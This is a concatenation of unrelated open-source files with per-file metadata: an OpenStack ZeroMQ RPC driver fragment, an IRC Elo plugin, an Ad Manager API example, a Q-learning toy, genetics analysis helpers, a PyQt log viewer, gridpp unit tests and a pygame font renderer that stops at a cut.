a timeout isn't too big a lie. raise rpc_common.Timeout, "No match from matchmaker." # This supports brokerless fanout (addresses > 1) for queue in queues: (_topic, ip_addr) = queue _addr = "tcp://%s:%s" % (ip_addr, conf.rpc_zmq_port) if method.__name__ == '_cast': eventlet.spawn_n(method, _addr, context, _topic, _topic, msg, timeout, serialize, force_envelope) return return method(_addr, context, _topic, _topic, msg, timeout, serialize, force_envelope) def create_connection(conf, new=True): return Connection(conf) def multicall(conf, *args, **kwargs): """Multiple calls.""" return _multi_send(_call, *args, **kwargs) def call(conf, *args, **kwargs): """Send a message, expect a response.""" data = _multi_send(_call, *args, **kwargs) return data[-1] def cast(conf, *args, **kwargs): """Send a message expecting no reply.""" _multi_send(_cast, *args, **kwargs) def fanout_cast(conf, context, topic, msg, **kwargs): """Send a message to all listening and expect no reply.""" # NOTE(ewindisch): fanout~ is used because it avoid splitting on . # and acts as a non-subtle hint to the matchmaker and ZmqProxy. 
_multi_send(_cast, context, 'fanout~' + str(topic), msg, **kwargs) def notify(conf, context, topic, msg, **kwargs): """ Send notification event. Notifications are sent to topic-priority. This differs from the AMQP drivers which send to topic.priority. """ # NOTE(ewindisch): dot-priority in rpc notifier does not # work with our assumptions. topic.replace('.', '-') kwargs['serialize'] = kwargs.pop('envelope') kwargs['force_envelope'] = True cast(conf, context, topic, msg, **kwargs) def cleanup(): """Clean up resources in use by implementation.""" global ZMQ_CTX if ZMQ_CTX: ZMQ_CTX.term() ZMQ_CTX = None global matchmaker matchmaker = None def _get_ctxt(): if not zmq: raise ImportError("Failed to import eventlet.green.zmq") global ZMQ_CTX if not ZMQ_CTX: ZMQ_CTX = zmq.Context(CONF.rpc_zmq_contexts) return ZMQ_CTX def _get_matchmaker(): global matchmaker if not matchmaker: # rpc_zmq_matchmaker should be set to a 'module.Class' mm_path = CONF.rpc_zmq_matchmaker.split('.') mm_module = '.'.join(mm_path[:-1]) mm_class = mm_path[-1] # Only initialize a class. if mm_path[-1][0] not in string.ascii_uppercase: LOG.error(_("Matchmaker could not be loaded.\n" "rpc_zmq_matchmaker is not a class.")) raise RPCException(_("Error loading Matchmaker.")) mm_impl = importutils.import_module(mm_module) mm_constructor = getattr(mm_impl, mm_class) matchmaker = mm_constructor() return matchmaker
apache-2.0
-8,324,594,890,385,945,000
31.018821
78
0.568361
false
4.02064
false
false
false
anlutro/botologist
plugins/qlranks.py
1
2116
import logging
log = logging.getLogger(__name__)

import requests
import requests.exceptions

import botologist.plugin


def _get_qlr_data(nick):
    url = "http://www.qlranks.com/api.aspx"
    response = requests.get(url, {"nick": nick}, timeout=4)
    return response.json()["players"][0]


def _get_qlr_elo(nick, modes=None):
    """
    Get someone's QLRanks ELO.

    nick should be a valid Quake Live nickname. modes should be an iterable
    (list, tuple) of game-modes to display ELO for (duel, ctf, tdm...)
    """
    if modes is None:
        modes = ("duel",)

    try:
        data = _get_qlr_data(nick)
    except requests.exceptions.RequestException:
        log.warning("QLRanks request caused an exception", exc_info=True)
        return "HTTP error, try again!"

    # qlranks returns rank 0 indicating a player has no rating - if all modes
    # have rank 0, it is safe to assume the player does not exist
    unranked = [mode["rank"] == 0 for mode in data.values() if isinstance(mode, dict)]
    if all(unranked):
        return "Player not found or no games played: " + data.get("nick", "unknown")

    retval = data["nick"]

    # convert to set to prevent duplicates
    for mode in set(modes):
        if mode not in data:
            return "Unknown mode: " + mode
        if data[mode]["rank"] == 0:
            retval += " - {mode}: unranked".format(mode=mode)
        else:
            retval += " - {mode}: {elo} (rank {rank:,})".format(
                mode=mode, elo=data[mode]["elo"], rank=data[mode]["rank"]
            )

    return retval


class QlranksPlugin(botologist.plugin.Plugin):
    """QLRanks plugin."""

    @botologist.plugin.command("elo", threaded=True)
    def get_elo(self, msg):
        """Get a player's ELO from qlranks."""
        if len(msg.args) < 1:
            return

        if len(msg.args) > 1:
            if "," in msg.args[1]:
                modes = msg.args[1].split(",")
            else:
                modes = msg.args[1:]
            return _get_qlr_elo(msg.args[0], modes)
        else:
            return _get_qlr_elo(msg.args[0])
mit
1,812,270,986,986,135,800
28.388889
86
0.58034
false
3.538462
false
false
false
Aloomaio/googleads-python-lib
examples/ad_manager/v201808/reconciliation_report_row_service/get_reconciliation_report_rows_for_reconciliation_report.py
1
2609
#!/usr/bin/env python
#
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#      http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Gets a reconciliation report's rows for line items that Ad Manager served.
"""

# Import appropriate modules from the client library.
from googleads import ad_manager

# Set the ID of the reconciliation report row.
RECONCILIATION_REPORT_ID = 'INSERT_RECONCILIATION_REPORT_ID_HERE'


def main(client, reconciliation_report_id):
  # Initialize appropriate service.
  reconciliation_report_row_service = client.GetService(
      'ReconciliationReportRowService', version='v201808')

  # Create a statement to select reconciliation report rows.
  statement = (ad_manager.StatementBuilder(version='v201808')
               .Where(('reconciliationReportId = :reportId '
                       'AND lineItemId != :lineItemId'))
               .WithBindVariable('lineItemId', 0)
               .WithBindVariable('reportId', long(reconciliation_report_id)))

  # Retrieve a small amount of reconciliation report rows at a time, paging
  # through until all reconciliation report rows have been retrieved.
  while True:
    response = (
        reconciliation_report_row_service
        .getReconciliationReportRowsByStatement(
            statement.ToStatement()))
    if 'results' in response and len(response['results']):
      for reconciliation_report_row in response['results']:
        # Print out some information for each reconciliation report row.
        print('Reconciliation report row with ID "%d", reconciliation source '
              '"%s", and reconciled volume "%d" was found.\n'
              % (reconciliation_report_row['id'],
                 reconciliation_report_row['reconciliationSource'],
                 reconciliation_report_row['reconciledVolume']))
      statement.offset += statement.limit
    else:
      break

  print '\nNumber of results found: %s' % response['totalResultSetSize']


if __name__ == '__main__':
  # Initialize client object.
  ad_manager_client = ad_manager.AdManagerClient.LoadFromStorage()
  main(ad_manager_client, RECONCILIATION_REPORT_ID)
apache-2.0
5,258,400,101,180,364,000
39.765625
78
0.706401
false
4.167732
false
false
false
minimalparts/Tutorials
RLcafe/caffe.py
1
3150
import numpy as np
import random

environment = {
    0: [('buongiorno',[[1,0,1]]),('un caffè',[[7,0,1]])],
    1: [('un caffè',[[2,0,0.8],[12,-2,0.2]])],
    2: [('per favore',[[3,0,1]]),('EOS',[[5,-2,0.9],[6,-1,0.1]])],
    3: [('EOS',[[4,-1,1]])],
    7: [('per favore',[[8,0,1]]),('EOS',[[9,-3,1]])],
    8: [('EOS',[[10,-2,0.9],[11,-1,0.1]])]
}

#index to actions
i_to_actions = {0: 'buongiorno', 1: 'un caffè', 2: 'per favore', 3: 'EOS'}
actions_to_i = {'buongiorno':0, 'un caffè':1, 'per favore':2, 'EOS':3}

#Initialising the Q matrix
q_matrix = []
for i in range(13):
    q_matrix.append([0,0,0,0])

exit_states = [4,5,6,9,10,11,12]


def get_possible_next_actions(cur_pos):
    return environment[cur_pos]


def get_next_state(action):
    word = action[0]
    possible_states = action[1]
    fate = {}
    for p in possible_states:
        s = p[0]
        r = p[1]
        l = p[2]
        fate[s] = [r,l]
    # pass the likelihoods through the 'p' keyword so they are actually used
    # as probabilities (the third positional argument of np.random.choice is
    # 'replace', not 'p')
    next_state = np.random.choice(list(fate.keys()), 1,
                                  p=[v[1] for k,v in fate.items()])
    reward = fate[next_state[0]][0]
    #print(next_state[0],reward)
    return next_state[0],reward


def game_over(cur_pos):
    return cur_pos in exit_states


discount = 0.9
learning_rate = 0.1

for _ in range(500):
    print("\nEpisode ", _ )
    # get starting place
    cur_pos = 0
    # while goal state is not reached
    episode_return = 0
    while(not game_over(cur_pos)):
        # get all possible next states from cur_step
        possible_actions = get_possible_next_actions(cur_pos)
        # select any one action randomly
        action = random.choice(possible_actions)
        word = action[0]
        action_i = actions_to_i[word]
        print(word)
        # find the next state corresponding to the action selected
        next_state,reward = get_next_state(action)
        episode_return += reward
        # update the q_matrix
        q_matrix[cur_pos][action_i] = q_matrix[cur_pos][action_i] + learning_rate * (reward + discount * max(q_matrix[next_state]) - q_matrix[cur_pos][action_i])
        print(cur_pos,q_matrix[cur_pos],next_state)
        # go to next state
        cur_pos = next_state
    print("Reward:",episode_return,"\n")

print(np.array(q_matrix).reshape(13,4))
print("Training done...")

print("\n***\nTesting...\n***\n")
# get starting place
cur_pos = 0
episode_return = 0
while(not game_over(cur_pos)):
    # get all possible next states from cur_step
    possible_actions = get_possible_next_actions(cur_pos)
    #print(possible_actions)
    # select the *possible* action with highest Q value
    action = None
    if np.linalg.norm(q_matrix[cur_pos]) == 0:
        action = random.choice(possible_actions)
    else:
        action = actions_to_i[possible_actions[0][0]]
        c = 0
        action_i = c
        for a in possible_actions:
            a_i = actions_to_i[a[0]]
            if q_matrix[cur_pos][a_i] > q_matrix[cur_pos][action]:
                action = a_i
                action_i = c
            c += 1
        action = possible_actions[action_i]
    print(action[0])
    next_state,reward = get_next_state(action)
    episode_return += reward
    cur_pos = next_state

print("Return:",episode_return)
mit
-4,122,450,842,618,977,300
30.148515
161
0.586459
false
2.902214
false
false
false
broadinstitute/cms
cms/power/power_func.py
1
8625
## functions for analyzing empirical/simulated CMS output ## last updated 09.14.2017 vitti@broadinstitute.org import matplotlib as mp mp.use('agg') import matplotlib.pyplot as plt import numpy as np import math from scipy.stats import percentileofscore ################### ## DEFINE SCORES ## ################### def write_master_likesfile(writefilename, model, selpop, freq,basedir, miss = "neut",): '''adapted from run_likes_func.py''' writefile = open(writefilename, 'w') for score in ['ihs', 'nsl', 'delihh']: hitlikesfilename = basedir + model + "/" + score + "/likes_sel" + str(selpop) + "_" + str(freq) + "_causal.txt"#_smoothed.txt" misslikesfilename = basedir + model + "/" + score + "/likes_sel" + str(selpop) + "_" + str(freq) + "_" + miss + ".txt"#"_smoothed.txt" #assert(os.path.isfile(hitlikesfilename) and os.path.isfile(misslikesfilename)) writefile.write(hitlikesfilename + "\n" + misslikesfilename + "\n") for score in ['xpehh', 'fst', 'deldaf']: hitlikesfilename = basedir + model + "/" + score + "/likes_sel" + str(selpop) + "_choose_" + str(freq) + "_causal.txt"#_smoothed.txt" misslikesfilename = basedir + model + "/" + score + "/likes_sel" + str(selpop) + "_choose_" + str(freq) + "_" + miss + ".txt"#"_smoothed.txt" #assert(os.path.isfile(hitlikesfilename) and os.path.isfile(misslikesfilename)) writefile.write(hitlikesfilename + "\n" + misslikesfilename + "\n") writefile.close() print("wrote to: " + writefilename) return ############### ## REGION ID ## ############### def get_window(istart, physpos, scores, windowlen = 100000): window_scores = [scores[istart]] startpos = physpos[istart] pos = startpos iscore = istart while pos < (startpos + windowlen): iscore += 1 if iscore >= len(scores): break window_scores.append(scores[iscore]) pos = physpos[iscore] #print(str(pos) + " " + str(startpos)) return window_scores def check_outliers(scorelist, cutoff = 3): numscores = len(scorelist) outliers = [item for item in scorelist if item > cutoff] numoutliers = len(outliers) percentage = (float(numoutliers) / float(numscores)) * 100. return percentage def check_rep_windows(physpos, scores, windowlen = 100000, cutoff = 3, totalchrlen=1000000): ''' previous implementation: !!!! 
this is going to result in false positives whenever I have a small uptick right near the edge of the replicate ''' #check window defined by each snp as starting point rep_percentages = [] numSnps = len(physpos) numWindows = 0 #get exhaustive windows and stop at chrom edge for isnp in range(numSnps): if physpos[isnp] + windowlen < totalchrlen: numWindows +=1 else: #print(str(physpos[isnp]) + "\t") break for iPos in range(numWindows): window_scores = get_window(iPos, physpos, scores, windowlen) percentage = check_outliers(window_scores, cutoff) rep_percentages.append(percentage) return rep_percentages def merge_windows(chrom_signif, windowlen, maxGap = 100000): print('should implement this using bedtools') starts, ends = [], [] contig = False this_windowlen = 0 starting_pos = 0 if len(chrom_signif) > 0: for i_start in range(len(chrom_signif) - 1): if not contig: starts.append(chrom_signif[i_start]) this_windowlen = windowlen #unmerged, default starting_pos = chrom_signif[i_start] if ((chrom_signif[i_start] + this_windowlen) > chrom_signif[i_start + 1]): #contiguous contig = True this_windowlen = chrom_signif[i_start +1] + windowlen - starting_pos #or, could also be contiguous in the situation where the next snp is not within this window because there doesn't exist such a snp elif chrom_signif[i_start +1] >=(chrom_signif[i_start] + this_windowlen) and chrom_signif[i_start +1] < (chrom_signif[i_start] + maxGap): contig = True this_windowlen = chrom_signif[i_start +1] + windowlen - starting_pos else: contig = False if not contig: windowend = chrom_signif[i_start] + windowlen ends.append(windowend) if contig: #last region is overlapped by its predecssor ends.append(chrom_signif[-1] + windowlen) else: starts.append(chrom_signif[-1]) ends.append(chrom_signif[-1] + windowlen) assert len(starts) == len(ends) return starts, ends ########################## ## POWER & SIGNIFICANCE ## ########################## def calc_pr(all_percentages, threshhold): numNeutReps_exceedThresh = 0 totalnumNeutReps = len(all_percentages) for irep in range(totalnumNeutReps): if len(all_percentages[irep]) != 0: if max(all_percentages[irep]) > threshhold: numNeutReps_exceedThresh +=1 numNeutReps_exceedThresh, totalnumNeutReps = float(numNeutReps_exceedThresh), float(totalnumNeutReps) if totalnumNeutReps != 0: pr = numNeutReps_exceedThresh / totalnumNeutReps else: pr = 0 print('ERROR; empty set') return pr def get_causal_rank(values, causal_val): if np.isnan(causal_val): return(float('nan')) assert(causal_val in values) cleanvals = [] for item in values: if not np.isnan(item) and not np.isinf(item): cleanvals.append(item) values = cleanvals values.sort() values.reverse() causal_rank = values.index(causal_val) return causal_rank def get_cdf_from_causal_ranks(causal_ranks): numbins = max(causal_ranks) #? heuristic counts, bins = np.histogram(causal_ranks, bins=numbins, normed = True) #doublecheck cdf = np.cumsum(counts) return bins, cdf def get_pval(all_simscores, thisScore): r = np.searchsorted(all_simscores,thisScore) n = len(all_simscores) pval = 1. - ((r + 1.) / (n + 1.)) if pval > 0: #pval *= nSnps #Bonferroni return pval else: #print("r: " +str(r) + " , n: " + str(n)) pval = 1. 
- (r/(n+1)) #pval *= nSnps #Bonferroni return pval ############### ## VISUALIZE ## ############### def quick_plot(ax, pos, val, ylabel,causal_index=-1): ax.scatter(pos, val, s=.8) if causal_index != -1: ax.scatter(pos[causal_index], val[causal_index], color='r', s=4) for tick in ax.yaxis.get_major_ticks(): tick.label.set_fontsize('6') ax.set_ylabel(ylabel, fontsize='6') #ax.set_xlim([0, 1500000]) #make flexible? ax.yaxis.set_label_position('right') #ax.set_ylim([min(val), max(val)]) return ax def plot_dist(allvals, savefilename= "/web/personal/vitti/test.png", numBins=1000): #print(allvals) #get rid of nans and infs #cleanvals = [item for item in allvals if not np.isnan(item)] #allvals = cleanvals allvals = np.array(allvals) allvals = allvals[~np.isnan(allvals)] allvals = allvals[~np.isinf(allvals)] #allvals = list(allvals) #print(allvals) print("percentile for score = 10: " + str(percentileofscore(allvals, 10))) print("percentile for score = 15: " + str(percentileofscore(allvals, 15))) if len(allvals) > 0: f, ax = plt.subplots(1) ax.hist(allvals, bins=numBins) plt.savefig(savefilename) print('plotted to ' + savefilename) return def plotManhattan(ax, neut_rep_scores, emp_scores, chrom_pos, nSnps, maxSkipVal = 0, zscores = True): #neut_rep_scores.sort() #print('sorted neutral scores...') lastpos = 0 for chrom in range(1,23): ichrom = chrom-1 if ichrom%2 == 0: plotcolor = "darkblue" else: plotcolor = "lightblue" if zscores == True: #http://stackoverflow.com/questions/3496656/convert-z-score-z-value-standard-score-to-p-value-for-normal-distribution-in?rq=1 #Z SCORE cf SG email 103116 #pvals = [get_pval(neut_rep_scores, item) for item in emp_scores[ichrom]] pvalues = [] for item in emp_scores[ichrom]: if item < maxSkipVal: #speed up this process by ignoring anything obviously insignificant pval = 1 else: #print('scipy') #sys.exit() pval = scipy.stats.norm.sf(abs(item)) pvalues.append(pval) #else: # pval = get_pval(neut_rep_scores, item) #pvalues.append(pval) print("calculated pvalues for chrom " + str(chrom)) chrom_pos = range(lastpos, lastpos + len(pvalues)) logtenpvals = [(-1. * math.log10(pval)) for pval in pvalues] ax.scatter(chrom_pos, logtenpvals, color =plotcolor, s=.5) lastpos = chrom_pos[-1] else: chrom_pos = range(lastpos, lastpos + len(emp_scores[ichrom])) ax.scatter(chrom_pos, emp_scores[ichrom], color=plotcolor, s=.5) lastpos = chrom_pos[-1] return ax def plotManhattan_extended(ax, emp_scores, chrom_pos, chrom): ''' makes a figure more like in Karlsson 2013 instead of Grossman 2013''' ax.plot(chrom_pos, emp_scores, linestyle='None', marker=".", markersize=.3, color="black") ax.set_ylabel('chr' + str(chrom), fontsize=6, rotation='horizontal') labels = ax.get_yticklabels() ax.set_yticklabels(labels, fontsize=6) ax.set_axis_bgcolor('LightGray') return ax
bsd-2-clause
7,845,082,051,252,510,000
34.9375
143
0.679072
false
2.7976
false
false
false
geosohh/AnimeTorr
animetorr/manager/log.py
1
7132
# -*- coding: utf-8 -*- """ Log window. """ __author__ = 'Sohhla' import os from PyQt4 import QtGui, QtCore from qt.log import Ui_Dialog as Ui_Log from shared import constant # TODO: Works, but waaaaaay too slow to load class LogUpdater(QtCore.QObject): """ Updates the [Log window]. """ finish = QtCore.pyqtSignal() update_ui = QtCore.pyqtSignal(str) def __init__(self, parent=None): super(LogUpdater, self).__init__(parent) self.log_paused = False self.previous_log_file_size = 0 self.timer = None self.log_lines_read = -1 self.html_log = "" def start_timer(self): """ Starts timer. When it times out, will update the window again. """ self.timer = QtCore.QTimer() # noinspection PyUnresolvedReferences self.timer.timeout.connect(self.update_log) # PyCharm doesn't recognize timeout.connect()... self.timer.setSingleShot(True) self.timer.start(1000) def update_log(self): """ Reads the log file and updates the window. """ if not self.log_paused: try: log_size = os.path.getsize(constant.LOG_PATH) except os.error: log_size = -1 if self.previous_log_file_size!=log_size and log_size!=-1: if self.previous_log_file_size > log_size: self.log_lines_read = -1 if self.log_lines_read == -1: self.html_log = "<table style=\"font-family:'MS Shell Dlg 2',monospace; font-size:14\">" # reading log, converting into html line_i = 0 for log_line in open(constant.LOG_PATH,'r'): if line_i >= self.log_lines_read: temp = log_line.split(" ## ") asctime = temp[0].strip() name = temp[1].strip() levelname = temp[2].strip() message = temp[3].strip() color = "0000FF" if levelname=="DEBUG": color = "008000" elif levelname=="INFO": color = "000000" elif levelname=="WARNING": color = "B8860B" elif levelname=="ERROR": color = "FF0000" elif levelname=="CRITICAL": color = "8A2BE2" temp = "<tr style=\"color:#"+color+";\">\ <td style=\"padding-right: 5px;\">"+asctime+"</td>\ <td style=\"padding-right: 10px;padding-left: 10px;\" align=\"center\">#</td>\ <td style=\"padding-right: 5px; padding-left: 5px; \" align=\"center\">"+name+"</td>\ <td style=\"padding-right: 10px;padding-left: 10px;\" align=\"center\">#</td>\ <td style=\"padding-right: 5px; padding-left: 5px; \" align=\"center\">"+levelname+"</td>\ <td style=\"padding-right: 10px;padding-left: 10px;\" align=\"center\">#</td>\ <td style=\"padding-left: 5px;\">"+message+"</td></tr>" self.html_log += temp line_i+=1 self.log_lines_read = line_i if self.log_paused: self.finish.emit() # log paused, exiting thread else: # sending update to GUI self.update_ui.emit(self.html_log+"</table>") self.previous_log_file_size = log_size self.start_timer() else: self.finish.emit() def stop_thread(self): """ Stops log update. """ if self.timer is not None: self.timer.stop() self.finish.emit() class WindowLog(): """ Creates Log window. """ def __init__(self, parent_window): self.dialog_log = WindowLogDialog(self, parent_window, QtCore.Qt.WindowSystemMenuHint | QtCore.Qt.WindowMaximizeButtonHint | QtCore.Qt.WindowTitleHint | QtCore.Qt.Window) self.ui_log = Ui_Log() self.ui_log.setupUi(self.dialog_log) self.ui_log.button_pause.clicked.connect(self.pause_log) self.ui_log.text_log.setHtml("Loading...") self.log_paused = False self.thread = None self.log_updater = None self.create_thread() def show(self): """ Shows Log window. """ self.dialog_log.exec_() def create_thread(self): """ Creates thread to update log. 
""" self.thread = QtCore.QThread(self.dialog_log) self.log_updater = LogUpdater() self.log_updater.moveToThread(self.thread) self.log_updater.update_ui.connect(self.update_log_ui) self.log_updater.finish.connect(self.thread.quit) # noinspection PyUnresolvedReferences self.thread.started.connect(self.log_updater.update_log) # PyCharm doesn't recognize started.connect()... self.thread.start() self.dialog_log.stop_thread.connect(self.log_updater.stop_thread) def update_log_ui(self,new_html): """ Update window with new html. :type new_html: str :param new_html: ... """ self.ui_log.text_log.setHtml(new_html) temp_cursor = self.ui_log.text_log.textCursor() temp_cursor.movePosition(QtGui.QTextCursor.End, QtGui.QTextCursor.MoveAnchor) self.ui_log.text_log.setTextCursor(temp_cursor) self.dialog_log.repaint() # noinspection PyArgumentList QtCore.QCoreApplication.processEvents(QtCore.QEventLoop.AllEvents) def pause_log(self): """ Stops window from being updated until the user clicks the button again. """ if self.log_paused: self.log_paused = False self.ui_log.button_pause.setText("Pause Log") self.create_thread() else: self.log_paused = True self.ui_log.button_pause.setText("Resume Log") self.dialog_log.stop_thread.emit() class WindowLogDialog(QtGui.QDialog): """ Overrides default QDialog class to be able to control the close window event. """ stop_thread = QtCore.pyqtSignal() def __init__(self, window, parent=None, params=None): super(WindowLogDialog, self).__init__(parent,params) self.window = window def closeEvent(self, _): """ When closing the window, stop the thread. :type _: QCloseEvent :param _: Describes the close event. Not used. """ if self.window.log_updater is not None: self.stop_thread.emit()
gpl-2.0
-3,731,463,448,882,287,600
35.768041
122
0.514582
false
4.129705
false
false
false
metno/gridpp
tests/neighbourhood_quantile_fast_test.py
1
5647
from __future__ import print_function import unittest import gridpp import numpy as np lats = [60, 60, 60, 60, 60, 70] lons = [10,10.1,10.2,10.3,10.4, 10] """Simple check 20 21 22 23 24 15 16 17 18 19 10 11 12 13 nan 5 6 7 nan 9 0 1 2 3 4 """ values = np.reshape(range(25), [5, 5]).astype(float) values[1, 3] = np.nan values[2, 4] = np.nan values = np.array(values) class Test(unittest.TestCase): def test_invalid_arguments(self): """Check that exception is thrown for invalid arguments""" field = np.ones([5, 5]) halfwidth = -1 quantiles = [-0.1, 1.1, np.nan] thresholds = [0, 1] for quantile in quantiles: with self.assertRaises(ValueError) as e: gridpp.neighbourhood_quantile_fast(field, quantile, halfwidth, thresholds) def test_nan_quantile(self): field = np.ones([5, 5]) halfwidth = 1 quantile = np.nan thresholds = [0, 1] output = gridpp.neighbourhood_quantile_fast(field, quantile, halfwidth, thresholds) np.testing.assert_array_almost_equal(np.nan*np.ones(output.shape), output) def test_empty(self): for quantile in np.arange(0.1,0.9,0.1): for num_thresholds in [1, 2]: thresholds = gridpp.get_neighbourhood_thresholds(values, num_thresholds) output = gridpp.neighbourhood_quantile_fast([[]], 0.9, 1, thresholds) self.assertEqual(len(output.shape), 2) self.assertEqual(output.shape[0], 0) self.assertEqual(output.shape[1], 0) def test_single_threshold(self): """Checks what happens when a single threshold is provided""" thresholds = [0] field = np.reshape(np.arange(9), [3, 3]) for halfwidth in [0, 1, 2]: output = gridpp.neighbourhood_quantile_fast(field, 0.9, halfwidth, thresholds) np.testing.assert_array_equal(output, np.zeros([3, 3])) def test_two_thresholds(self): """Checks what happens when a single threshold is provided""" thresholds = [0, 1] field = np.reshape(np.arange(9), [3, 3]) for halfwidth in [0, 1, 2]: output = gridpp.neighbourhood_quantile_fast(field, 0.9, 0, thresholds) self.assertTrue(((output >= 0) & (output <= 1)).all()) def test_missing(self): empty = np.zeros([5, 5]) empty[0:3, 0:3] = np.nan thresholds = [0, 1] output = gridpp.neighbourhood_quantile_fast(empty, 0.5, 1, thresholds) self.assertTrue(np.isnan(np.array(output)[0:2,0:2]).all()) def test_quantile(self): thresholds = gridpp.get_neighbourhood_thresholds(values, 100) output = np.array(gridpp.neighbourhood_quantile_fast(values, 0.5, 1, thresholds)) self.assertEqual(output[2][2], 12) # Should be 12.5 self.assertEqual(output[2][3], 12.5) # Should be 13 output = np.array(gridpp.neighbourhood_quantile_fast(np.full([100,100], np.nan), 0.5, 1, thresholds)) self.assertTrue(np.isnan(np.array(output)).all()) output = np.array(gridpp.neighbourhood_quantile_fast(np.zeros([100,100]), 0.5, 1, thresholds)) self.assertTrue((np.array(output) == 0).all()) output = np.array(gridpp.neighbourhood_quantile(values, 0.5, 1)) self.assertEqual(output[2][2], 12.5) self.assertEqual(output[2][3], 13) self.assertEqual(output[0][4], 4) def test_3d(self): np.random.seed(1000) values = np.random.rand(200, 200) values3 = np.zeros([200, 200, 5]) for i in range(5): values3[:, :, i] = values halfwidths = [0, 1, 5] quantile = 0.5 thresholds = [0, 0.25, 0.5, 0.75, 1] for halfwidth in halfwidths: output_2d = gridpp.neighbourhood_quantile_fast(values, quantile, halfwidth, thresholds) output_3d = gridpp.neighbourhood_quantile_fast(values3, quantile, halfwidth, thresholds) np.testing.assert_array_almost_equal(output_2d, output_3d) def test_varying_quantile(self): """ For now check that this runs """ values = np.array([[0, 1], [2, 3], [4, 5]]) halfwidth = 1 quantiles = 
np.ones(values.shape) * 0.5 thresholds = [0, 0.25, 0.5, 0.75, 1] gridpp.neighbourhood_quantile_fast(values, quantiles, halfwidth, thresholds) values = np.nan *np.zeros(values.shape) np.testing.assert_array_equal(values, gridpp.neighbourhood_quantile_fast(values, quantiles, halfwidth, thresholds)) def test_varying_quantile_3d(self): """ For now check that this runs """ np.random.seed(1000) values = np.random.rand(100, 50, 2) halfwidth = 1 quantiles = np.ones(values[:, :, 0].shape) * 0.5 thresholds = [0, 0.25, 0.5, 0.75, 1] gridpp.neighbourhood_quantile_fast(values, quantiles, halfwidth, thresholds) values = np.nan *np.zeros(values.shape) np.testing.assert_array_equal(values[:, :, 0], gridpp.neighbourhood_quantile_fast(values, quantiles, halfwidth, thresholds)) def test_all_same(self): """ Check that min and max of an neighbourhood with all identical values is correct """ field = np.zeros([10, 10]) thresholds = [0, 0.1, 0.2, 0.5, 1, 2, 5, 10, 20, 50, 100] for quantile in [0, 0.001, 0.999, 1]: with self.subTest(quantile=quantile): output = gridpp.neighbourhood_quantile_fast(field, quantile, 5, thresholds) np.testing.assert_array_almost_equal(output, field) if __name__ == '__main__': unittest.main()
gpl-2.0
6,977,101,496,407,008,000
39.335714
132
0.606517
false
3.290793
true
false
false
Fenixin/yogom
tryengine/fontrenderer.py
1
8186
#!/usr/bin/env python # -*- coding: utf-8 -*- # # This file is part of TryEngine. # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # ''' Created on 20/03/2014 @author: Alejandro Aguilera Martínez @email: fenixin@gmail.com Module to render fonts with different effects. See FontRenderer for help. ''' from itertools import product from math import ceil import pygame as pg from pygame.font import Font from pygame import Surface from pygame.transform import laplacian #TODO: Transparent things aren't handled properly! # Choosing the same color as the transparent color # used internally will do very ugly stuff class FontRenderer(object): ''' Object to render text of any size. Rendering text is made through layers. Layer are passed to render with a list. You can render as many layer as you want. Here it is an example with all the layer types: layers = [ ('external_border',{'width':2, 'color':VIOLET}), ('shadows',{'positions_and_colors':[((2,-2),GREEN),((1,-1),RED)]}), ('normal',{'color':WHITE}),# ('internal_border', {'color':(GREEN)}), ('textured',{'image':image_texture}) ] ''' TRANSPARENT = (255, 0, 255) def __init__(self, font_file, antialias=False): ''' Constructor ''' if font_file: self.font_file = font_file else: self.font_file = pg.font.get_default_font() self._font_sizes = {} self.antialias = antialias # Parameters to create images self.DISPLAY_BITDEPTH = pg.display.get_surface().get_bitsize() self.IMG_FLAGS = pg.HWSURFACE def _add_fontsize(self, filename, size): """ Add a font size renderer to _font_sizes. """ self._font_sizes[size] = Font(filename, size) def __getitem__(self, size): """ Return the proper font size. """ try: return self._font_sizes[size] except KeyError: self._add_fontsize(self.font_file, size) return self._font_sizes[size] def _get_new_surface(self, text, pixel_size): """ Return a surface with the needed size for the text.""" img = Surface(pixel_size, self.IMG_FLAGS) img.fill(self.TRANSPARENT) img.set_colorkey(self.TRANSPARENT) return img def size(self, text, size, layers = []): """ Return the image size in pixels. This take into account all the layer given and calculate the correct image size. """ x, y = self[size].size(text) for layer in layers: if layer[0] == 'shadows': mx = my = 0 for t in layer[1]['positions_and_colors']: mx = max(abs(t[0][0]), mx) my = max(abs(t[0][1]), my) x += mx*2 y += my*2 elif layer[0] == 'external_border': width = layer[1]['width'] x += width*2 y += width*2 return (x,y) def _render_internal(self, text, size, color, bg_color): """ Wrapper """ # For fastest blitting set hwsurface and the same # bit depth as the display surface. 
# Also for your # own sanity, remember that rendering fonts will give # you a 8bit image and, sometimes, this will give # unexpected results # when blittings in a 32bits surface img = self[size].render(text, self.antialias, color, bg_color) return img.convert(self.DISPLAY_BITDEPTH, self.IMG_FLAGS) def render(self, text, size, bg_color, bg_transparent, layers): """ Render text through the defined layers. """ pixel_size = self.size(text, size, layers) wo_effects_ps = self[size].size(text) offset = ((pixel_size[0] - wo_effects_ps[0]) / 2, (pixel_size[1] - wo_effects_ps[1]) / 2) result = self._get_new_surface(text, pixel_size) result.fill(bg_color) if bg_transparent: result.set_colorkey(bg_color) # Create all the images and blit them together images = [getattr(self, '_' + fun)(text, size, pixel_size, offset, **args) for fun, args in layers] [result.blit(image, (0,0)) for image in images] return result def _fill_image(self, dest, filler, blendmode = 0): """ Fills dest surface with filler repeating if necesary. """ ds = dest.get_size() fs = filler.get_size() for x in xrange(int(ceil(ds[0]/float(fs[0])))): for y in xrange(int(ceil(ds[1]/float(fs[1])))): dest.blit(filler, (x*fs[0],y*fs[1]), None, blendmode) print x,y """ Layers """ def _textured(self, text, size, pixel_size, offset, image = None): """ Render a textured font. Transparent colors in the texture will be ignored. """ BG 